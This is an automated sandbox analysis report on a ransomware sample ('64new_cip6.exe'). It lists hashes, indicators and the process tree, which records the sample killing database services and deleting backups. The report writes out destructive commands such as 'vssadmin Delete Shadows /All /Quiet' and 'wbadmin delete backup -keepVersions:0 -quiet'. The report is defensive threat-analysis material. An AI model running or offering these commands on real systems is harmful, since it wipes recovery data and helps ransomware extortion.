Resubmissions
23-01-2023 15:59
230123-tfhcmaff5y 1030-11-2022 07:42
221130-jjqs3adc2x 1029-11-2022 11:01
221129-m4m5fsfd71 10Analysis
-
max time kernel
123s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
29-11-2022 11:01
Static task
static1
Behavioral task
behavioral1
Sample
64new_cip6.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
64new_cip6.exe
Resource
win10v2004-20220812-en
General
-
Target
64new_cip6.exe
-
Size
309KB
-
MD5
4ee1b43ffdea06ff320b1dbfc7195087
-
SHA1
3efec2894e16fa21417808c99bedfa7ddbd5c881
-
SHA256
c1fbc69f6892aa18f81cfaf0fc889be96a9421324fbd87cde99cd06731d27615
-
SHA512
64c285f003d72c20a839b19584a1576fc8f4f11b3500c5969102781241760a1fdb5d341e4e3862227792752bf15a145ce99f94dde3ed8ad6147032f0b0ea04e8
-
SSDEEP
6144:vPLavV9JccWJzcwYuUxhCKrSjZ5pjedRYc4ihyYr+3l0W3WtCyaw7c:v+vV9CZMuUxhC6SjZfjeu++3Gaw7c
Malware Config
Extracted
\??\A:\!-Recovery_Instructions-!.html
<h2>Mikesupp77@outlook.com</h2>
https://tox.chat/download.html</p>
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
64new_cip6.exedescription pid process target process PID 4268 created 676 4268 64new_cip6.exe Explorer.EXE -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 4812 bcdedit.exe 4992 bcdedit.exe -
Processes:
wbadmin.exewbadmin.exepid process 5088 wbadmin.exe 1340 wbadmin.exe -
Processes:
wbadmin.exepid process 3272 wbadmin.exe -
Modifies Installed Components in the registry 2 TTPs 1 IoCs
Processes:
explorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Modifies extensions of user files 5 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
64new_cip6.exedescription ioc process File renamed C:\Users\Admin\Pictures\ReceiveUpdate.crw => C:\Users\Admin\Pictures\ReceiveUpdate.crw.cipher6 64new_cip6.exe File opened for modification C:\Users\Admin\Pictures\SearchMount.tiff 64new_cip6.exe File renamed C:\Users\Admin\Pictures\SearchMount.tiff => C:\Users\Admin\Pictures\SearchMount.tiff.cipher6 64new_cip6.exe File renamed C:\Users\Admin\Pictures\StepResize.crw => C:\Users\Admin\Pictures\StepResize.crw.cipher6 64new_cip6.exe File renamed C:\Users\Admin\Pictures\UninstallPing.tif => C:\Users\Admin\Pictures\UninstallPing.tif.cipher6 64new_cip6.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
64new_cip6.exedescription ioc process File opened (read-only) \??\B: 64new_cip6.exe File opened (read-only) \??\E: 64new_cip6.exe File opened (read-only) \??\G: 64new_cip6.exe File opened (read-only) \??\M: 64new_cip6.exe File opened (read-only) \??\O: 64new_cip6.exe File opened (read-only) \??\I: 64new_cip6.exe File opened (read-only) \??\S: 64new_cip6.exe File opened (read-only) \??\W: 64new_cip6.exe File opened (read-only) \??\V: 64new_cip6.exe File opened (read-only) \??\Z: 64new_cip6.exe File opened (read-only) \??\A: 64new_cip6.exe File opened (read-only) \??\F: 64new_cip6.exe File opened (read-only) \??\L: 64new_cip6.exe File opened (read-only) \??\P: 64new_cip6.exe File opened (read-only) \??\T: 64new_cip6.exe File opened (read-only) \??\U: 64new_cip6.exe File opened (read-only) \??\X: 64new_cip6.exe File opened (read-only) \??\Y: 64new_cip6.exe File opened (read-only) \??\H: 64new_cip6.exe File opened (read-only) \??\J: 64new_cip6.exe File opened (read-only) \??\K: 64new_cip6.exe File opened (read-only) \??\N: 64new_cip6.exe File opened (read-only) \??\Q: 64new_cip6.exe File opened (read-only) \??\R: 64new_cip6.exe -
Drops file in Windows directory 3 IoCs
Processes:
wbadmin.exedescription ioc process File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl wbadmin.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 2168 676 WerFault.exe Explorer.EXE 3376 3844 WerFault.exe explorer.exe -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
vds.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1320 vssadmin.exe -
Kills process with taskkill 16 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1560 taskkill.exe 704 taskkill.exe 1760 taskkill.exe 1424 taskkill.exe 624 taskkill.exe 2116 taskkill.exe 4432 taskkill.exe 3280 taskkill.exe 3772 taskkill.exe 3724 taskkill.exe 2660 taskkill.exe 3932 taskkill.exe 2120 taskkill.exe 4488 taskkill.exe 1432 taskkill.exe 3216 taskkill.exe -
Modifies registry class 2 IoCs
Processes:
explorer.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2295526160-1155304984-640977766-1000\{6D5AE515-087A-4862-BBC8-B66AE676AF6C} explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ explorer.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
64new_cip6.exepid process 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe 4268 64new_cip6.exe -
Suspicious use of AdjustPrivilegeToken 55 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exevssvc.exeWMIC.exewbengine.exeexplorer.exedescription pid process Token: SeDebugPrivilege 624 taskkill.exe Token: SeDebugPrivilege 2116 taskkill.exe Token: SeDebugPrivilege 2120 taskkill.exe Token: SeDebugPrivilege 1560 taskkill.exe Token: SeDebugPrivilege 4488 taskkill.exe Token: SeDebugPrivilege 4432 taskkill.exe Token: SeDebugPrivilege 3280 taskkill.exe Token: SeDebugPrivilege 3724 taskkill.exe Token: SeDebugPrivilege 3772 taskkill.exe Token: SeDebugPrivilege 1760 taskkill.exe Token: SeDebugPrivilege 2660 taskkill.exe Token: SeDebugPrivilege 704 taskkill.exe Token: SeDebugPrivilege 1424 taskkill.exe Token: SeDebugPrivilege 1432 taskkill.exe Token: SeDebugPrivilege 3932 taskkill.exe Token: SeDebugPrivilege 3216 taskkill.exe Token: SeBackupPrivilege 3104 vssvc.exe Token: SeRestorePrivilege 3104 vssvc.exe Token: SeAuditPrivilege 3104 vssvc.exe Token: SeIncreaseQuotaPrivilege 3572 WMIC.exe Token: SeSecurityPrivilege 3572 WMIC.exe Token: SeTakeOwnershipPrivilege 3572 WMIC.exe Token: SeLoadDriverPrivilege 3572 WMIC.exe Token: SeSystemProfilePrivilege 3572 WMIC.exe Token: SeSystemtimePrivilege 3572 WMIC.exe Token: SeProfSingleProcessPrivilege 3572 WMIC.exe Token: SeIncBasePriorityPrivilege 3572 WMIC.exe Token: SeCreatePagefilePrivilege 3572 WMIC.exe Token: SeBackupPrivilege 3572 WMIC.exe Token: SeRestorePrivilege 3572 WMIC.exe Token: SeShutdownPrivilege 3572 WMIC.exe Token: SeDebugPrivilege 3572 WMIC.exe Token: SeSystemEnvironmentPrivilege 3572 WMIC.exe Token: SeRemoteShutdownPrivilege 3572 WMIC.exe Token: SeUndockPrivilege 3572 WMIC.exe Token: SeManageVolumePrivilege 3572 WMIC.exe Token: 33 3572 WMIC.exe Token: 34 3572 WMIC.exe Token: 35 3572 WMIC.exe Token: 36 3572 WMIC.exe Token: SeBackupPrivilege 1092 wbengine.exe Token: SeRestorePrivilege 1092 wbengine.exe Token: SeSecurityPrivilege 1092 wbengine.exe Token: SeShutdownPrivilege 3844 explorer.exe Token: SeCreatePagefilePrivilege 3844 explorer.exe Token: SeShutdownPrivilege 3844 explorer.exe Token: SeCreatePagefilePrivilege 3844 explorer.exe Token: SeShutdownPrivilege 3844 explorer.exe Token: SeCreatePagefilePrivilege 3844 explorer.exe Token: SeShutdownPrivilege 3844 explorer.exe Token: SeCreatePagefilePrivilege 3844 explorer.exe Token: SeShutdownPrivilege 3844 explorer.exe Token: SeCreatePagefilePrivilege 3844 explorer.exe Token: SeShutdownPrivilege 3844 explorer.exe Token: SeCreatePagefilePrivilege 3844 explorer.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
Processes:
explorer.exepid process 3844 explorer.exe 3844 explorer.exe 3844 explorer.exe 3844 explorer.exe 3844 explorer.exe 3844 explorer.exe -
Suspicious use of SendNotifyMessage 8 IoCs
Processes:
explorer.exepid process 3844 explorer.exe 3844 explorer.exe 3844 explorer.exe 3844 explorer.exe 3844 explorer.exe 3844 explorer.exe 3844 explorer.exe 3844 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
64new_cip6.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4268 wrote to memory of 5068 4268 64new_cip6.exe cmd.exe PID 4268 wrote to memory of 5068 4268 64new_cip6.exe cmd.exe PID 4268 wrote to memory of 5068 4268 64new_cip6.exe cmd.exe PID 5068 wrote to memory of 3236 5068 cmd.exe cmd.exe PID 5068 wrote to memory of 3236 5068 cmd.exe cmd.exe PID 4268 wrote to memory of 3924 4268 64new_cip6.exe cmd.exe PID 4268 wrote to memory of 3924 4268 64new_cip6.exe cmd.exe PID 4268 wrote to memory of 3924 4268 64new_cip6.exe cmd.exe PID 3924 wrote to memory of 4760 3924 cmd.exe cmd.exe PID 3924 wrote to memory of 4760 3924 cmd.exe cmd.exe PID 4760 wrote to memory of 624 4760 cmd.exe taskkill.exe PID 4760 wrote to memory of 624 4760 cmd.exe taskkill.exe PID 4268 wrote to memory of 4736 4268 64new_cip6.exe cmd.exe PID 4268 wrote to memory of 4736 4268 64new_cip6.exe cmd.exe PID 4268 wrote to memory of 4736 4268 64new_cip6.exe cmd.exe PID 4736 wrote to memory of 3656 4736 cmd.exe cmd.exe PID 4736 wrote to memory of 3656 4736 cmd.exe cmd.exe PID 3656 wrote to memory of 2116 3656 cmd.exe taskkill.exe PID 3656 wrote to memory of 2116 3656 cmd.exe taskkill.exe PID 4268 wrote to memory of 1548 4268 64new_cip6.exe cmd.exe PID 4268 wrote to memory of 1548 4268 64new_cip6.exe cmd.exe PID 4268 wrote to memory of 1548 4268 64new_cip6.exe cmd.exe PID 1548 wrote to memory of 4148 1548 cmd.exe cmd.exe PID 1548 wrote to memory of 4148 1548 cmd.exe cmd.exe PID 4148 wrote to memory of 2120 4148 cmd.exe taskkill.exe PID 4148 wrote to memory of 2120 4148 cmd.exe taskkill.exe PID 4268 wrote to memory of 1792 4268 64new_cip6.exe cmd.exe PID 4268 wrote to memory of 1792 4268 64new_cip6.exe cmd.exe PID 4268 wrote to memory of 1792 4268 64new_cip6.exe cmd.exe PID 1792 wrote to memory of 1980 1792 cmd.exe cmd.exe PID 1792 wrote to memory of 1980 1792 cmd.exe cmd.exe PID 1980 wrote to memory of 1560 1980 cmd.exe taskkill.exe PID 1980 wrote to memory of 1560 1980 cmd.exe taskkill.exe PID 4268 wrote to memory of 1504 4268 64new_cip6.exe cmd.exe PID 4268 wrote to memory of 1504 4268 64new_cip6.exe cmd.exe PID 4268 wrote to memory of 1504 4268 64new_cip6.exe cmd.exe PID 1504 wrote to memory of 1936 1504 cmd.exe cmd.exe PID 1504 wrote to memory of 1936 1504 cmd.exe cmd.exe PID 1936 wrote to memory of 4488 1936 cmd.exe taskkill.exe PID 1936 wrote to memory of 4488 1936 cmd.exe taskkill.exe PID 4268 wrote to memory of 3784 4268 64new_cip6.exe cmd.exe PID 4268 wrote to memory of 3784 4268 64new_cip6.exe cmd.exe PID 4268 wrote to memory of 3784 4268 64new_cip6.exe cmd.exe PID 3784 wrote to memory of 3016 3784 cmd.exe cmd.exe PID 3784 wrote to memory of 3016 3784 cmd.exe cmd.exe PID 3016 wrote to memory of 4432 3016 cmd.exe taskkill.exe PID 3016 wrote to memory of 4432 3016 cmd.exe taskkill.exe PID 4268 wrote to memory of 380 4268 64new_cip6.exe cmd.exe PID 4268 wrote to memory of 380 4268 64new_cip6.exe cmd.exe PID 4268 wrote to memory of 380 4268 64new_cip6.exe cmd.exe PID 380 wrote to memory of 4756 380 cmd.exe cmd.exe PID 380 wrote to memory of 4756 380 cmd.exe cmd.exe PID 4756 wrote to memory of 3280 4756 cmd.exe taskkill.exe PID 4756 wrote to memory of 3280 4756 cmd.exe taskkill.exe PID 4268 wrote to memory of 4524 4268 64new_cip6.exe cmd.exe PID 4268 wrote to memory of 4524 4268 64new_cip6.exe cmd.exe PID 4268 wrote to memory of 4524 4268 64new_cip6.exe cmd.exe PID 4524 wrote to memory of 1908 4524 cmd.exe cmd.exe PID 4524 wrote to memory of 1908 4524 cmd.exe cmd.exe PID 1908 wrote to memory of 3724 1908 cmd.exe taskkill.exe PID 1908 wrote to memory of 3724 1908 cmd.exe taskkill.exe PID 4268 wrote to memory of 4260 4268 64new_cip6.exe cmd.exe PID 4268 wrote to memory of 4260 4268 64new_cip6.exe cmd.exe PID 4268 wrote to memory of 4260 4268 64new_cip6.exe cmd.exe -
System policy modification 1 TTPs 4 IoCs
Processes:
64new_cip6.exe64new_cip6.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 64new_cip6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 64new_cip6.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 64new_cip6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 64new_cip6.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\64new_cip6.exe"C:\Users\Admin\AppData\Local\Temp\64new_cip6.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Modifies extensions of user files
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c rem Kill "SQL"4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im sqlbrowser.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlwriter.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlwriter.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im sqlwriter.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im sqlservr.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im msmdsrv.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im MsDtsSrvr.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im sqlceip.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im fdlauncher.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im Ssms.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im SQLAGENT.EXE5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im fdhost.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im fdlauncher.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im sqlservr.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im ReportingServicesService.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im msftesql.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im pg_ctl.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im postgres.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im postgres.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im postgres.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper1003⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper1004⤵
-
C:\Windows\system32\net.exenet stop MSSQLServerADHelper1005⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper1006⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS4⤵
-
C:\Windows\system32\net.exenet stop MSSQL$ISARS5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ISARS6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW4⤵
-
C:\Windows\system32\net.exenet stop MSSQL$MSFW5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$MSFW6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS4⤵
-
C:\Windows\system32\net.exenet stop SQLAgent$ISARS5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$ISARS6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW4⤵
-
C:\Windows\system32\net.exenet stop SQLAgent$MSFW5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$MSFW6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLBrowser4⤵
-
C:\Windows\system32\net.exenet stop SQLBrowser5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop ReportServer$ISARS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop ReportServer$ISARS4⤵
-
C:\Windows\system32\net.exenet stop ReportServer$ISARS5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLWriter4⤵
-
C:\Windows\system32\net.exenet stop SQLWriter5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet4⤵
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet5⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersions:0 -quiet3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersions:0 -quiet4⤵
-
C:\Windows\system32\wbadmin.exewbadmin delete backup -keepVersions:0 -quiet5⤵
- Deletes system backups
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest3⤵
-
